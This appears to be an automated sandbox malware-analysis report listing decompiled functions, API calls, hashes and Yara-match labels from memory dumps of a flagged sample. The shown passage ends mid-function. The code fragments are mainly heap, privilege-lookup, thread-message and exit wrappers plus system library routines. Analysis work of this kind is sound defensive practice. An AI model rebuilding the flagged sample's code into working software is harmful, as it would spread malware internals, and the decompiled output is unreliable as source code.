Function 0072FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FEDB

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0072FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FEAB

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0072FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FFBF

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				L00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B20(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E30(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x0040726f
0x00407273
0x0040727e
0x0040728a
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00407235, Relevance: 1.5, APIs: 1, Instructions: 49
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00407235(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _t6;
				int _t7;
				intOrPtr _t10;
				void* _t11;
				long _t20;
				void* _t22;
				int _t23;
				void* _t27;

				asm("adc dl, bh");
				if(__eflags <= 0) {
					_t7 = L00413E30(_t22, _t6, 0, 0, 0xc4e7b6d6);
					_t23 = _t7;
					__eflags = _t23;
					if(_t23 != 0) {
						_t20 =  *(_t27 + 0xc);
						_t7 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
						__eflags = _t7;
						if(__eflags == 0) {
							_t7 =  *_t23(_t20, 0x8003, _t27 + (E00409280(__eflags, 1, 8) & 0x000000ff) - 0x40, _t7);
						}
					}
					return _t7;
				} else {
					asm("aas");
					_t10 =  *0x568e29e7;
					_push(_t22);
					_t11 = L00419700(_t10, __ecx, 0x11c6f95e);
					return L004195B0(__ecx) + _t11 + 0x1000; // executed
				}
			}

0x00407235
0x00407237
0x0040729e
0x004072a3
0x004072a8
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x004072dd
0x004072e2
0x00407239
0x00407239
0x0040723c
0x00407240
0x00407246
0x0040725d
0x0040725d

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
Instruction ID: 471561d3f7ca916a2f66550eb52f1a368f70a27f6b475d732e7386b654590829
Opcode Fuzzy Hash: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
Instruction Fuzzy Hash: 6EF04C32E8021035E62165A52C43FFA334D4B40B15F05006FFF04FA2C2E6996D0582EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184C9, Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004184C9(void* __eax, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				void* _t9;
				char _t13;
				void* _t14;
				void* _t20;
				void* _t29;

				_pop(_t14);
				_t9 = __eax + 1;
				asm("aaa");
				_t15 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
				_t29 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
				_t10 = _a8;
				_t4 = _t10 + 0xc74; // 0xc74
				L00418DC0(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}

0x004184c9
0x004184ca
0x004184cb
0x004184cc
0x004184cc
0x004184d3
0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
Instruction ID: 5cccc2591089b8043b59645ecdbf8b8adda3bc674d5e08dd215ac923b18c5cf1
Opcode Fuzzy Hash: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
Instruction Fuzzy Hash: 2CE09AB5200200AFD714EF94CC88EE733A8EF88354F008589FD585B281CA30EC10CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00758788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00758788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00758460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0073E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0075718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00758460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0075718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00758460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00758460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00758460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0075718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00732340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0074E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0073E2A8(_t322,  &_v68, _v16);
								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0074E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0073E2A8(_t322,  &_v68, _t236);
								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0075718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00732340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0074E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0073E2A8(_v12,  &_v68, _v16);
							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0074E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0073E2A8(_t322,  &_v68, _t269);
							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0075718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00732340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0074E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0073E2A8(_v12,  &_v68, _v16);
						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0074E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0073E2A8(_t322,  &_v68, _t296);
						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00758788
0x00758788
0x00758791
0x00758794
0x00758798
0x0075879b
0x0075879e
0x007587a1
0x007587a4
0x007587a7
0x007587aa
0x007587af
0x007a1ad3
0x00758b0a
0x00758b0d
0x00758b13
0x00758b19
0x00758b1f
0x00758b25
0x00758b2b
0x00758b31
0x00758b37
0x00758b3d
0x00758b46
0x00758b46
0x007587c6
0x007587d0
0x007a1ae0
0x007a1ae6
0x007a1af8
0x007a1af8
0x007a1afd
0x007a1afe
0x007a1b01
0x007a1b06
0x007a1b06
0x007587d6
0x007587f2
0x007587f7
0x00758807
0x0075880a
0x0075880f
0x00758810
0x00758813
0x00758818
0x00758818
0x0075882c
0x00758831
0x00758838
0x00758908
0x00758920
0x007589f0
0x00758a08
0x00758af6
0x00758af6
0x00758af8
0x00758afb
0x007a1beb
0x007a1beb
0x00758b04
0x007a1bf8
0x007a1c0e
0x007a1c13
0x007a1c16
0x007a1c16
0x007a1bf8
0x00000000
0x00758b04
0x00758a0e
0x00758a11
0x00758a14
0x00758a15
0x00758a18
0x00758a22
0x00758b59
0x00758a28
0x00758a3c
0x00758a3c
0x00758a42
0x007a1bb0
0x007a1b11
0x007a1b11
0x00000000
0x00758a48
0x00758a51
0x00758a5b
0x00758a5e
0x00758a61
0x00758a69
0x00758a69
0x00758a6d
0x00000000
0x00000000
0x00758a74
0x00758a7c
0x00758a7d
0x00758a91
0x00758a93
0x00758a93
0x00758a98
0x00758a9b
0x00758aa1
0x00758aa1
0x00758aa4
0x00758aaa
0x00758ab1
0x00758ac5
0x00758ac7
0x00758ac7
0x00758ac5
0x00758ace
0x007a1bc9
0x007a1bce
0x007a1bd2
0x007a1bd2
0x00758ad8
0x00758aeb
0x00758aeb
0x00758af0
0x00758af4
0x00000000
0x00758af4
0x00758a42
0x00758926
0x00758929
0x0075892c
0x0075892d
0x00758930
0x00758935
0x0075893a
0x00758b51
0x00758940
0x00758954
0x00758954
0x0075895a
0x007a1b63
0x00000000
0x00758960
0x00758969
0x00758973
0x00758976
0x00758979
0x0075897e
0x00758981
0x00758981
0x00758986
0x00000000
0x00000000
0x007a1b6e
0x007a1b74
0x007a1b7b
0x007a1b8f
0x007a1b91
0x007a1b91
0x007a1b99
0x007a1b9c
0x007a1ba2
0x007a1ba2
0x0075898c
0x00758992
0x00758999
0x007589ad
0x007a1ba8
0x007a1ba8
0x007589ad
0x007589b6
0x007589c8
0x007589cd
0x007589d0
0x007589d0
0x007589d6
0x007589e8
0x007589e8
0x007589ed
0x00000000
0x007589ed
0x0075895a
0x0075883e
0x00758841
0x00758844
0x00758845
0x00758848
0x0075884d
0x00758852
0x00758b49
0x00758858
0x0075886c
0x0075886c
0x00758872
0x007a1b0e
0x00000000
0x00758878
0x00758881
0x0075888b
0x0075888e
0x00758891
0x00758896
0x00758899
0x00758899
0x0075889e
0x00000000
0x00000000
0x007a1b21
0x007a1b27
0x007a1b2e
0x007a1b42
0x007a1b44
0x007a1b44
0x007a1b4c
0x007a1b4f
0x007a1b55
0x007a1b55
0x007588a4
0x007588aa
0x007588b1
0x007588c5
0x007a1b5b
0x007a1b5b
0x007588c5
0x007588ce
0x007588e0
0x007588e5
0x007588e8
0x007588e8
0x007588ee
0x00758900
0x00758900
0x00758905
0x00000000
0x00758905

APIs

_wcspbrk.LIBCMT ref: 00758891
_wcspbrk.LIBCMT ref: 00758979
_wcspbrk.LIBCMT ref: 00758A61
_wcspbrk.LIBCMT ref: 00758A9B
_wcspbrk.LIBCMT ref: 007A1B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 007589FC
Kernel-MUI-Number-Allowed, xrefs: 007587E6
WindowsExcludedProcs, xrefs: 007587C1
Kernel-MUI-Language-Disallowed, xrefs: 00758914
Kernel-MUI-Language-Allowed, xrefs: 00758827

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
Instruction ID: 0a2a6bccf57b74669135fc915fec59ba5444a59e5f638f92d9dfc0a2d4a0b0b9
Opcode Fuzzy Hash: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
Instruction Fuzzy Hash: 34F115B2D00209EFDF51DF94C985DEEB7B8FF08301F14446AE905A7211EB78AA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 007713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E007713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
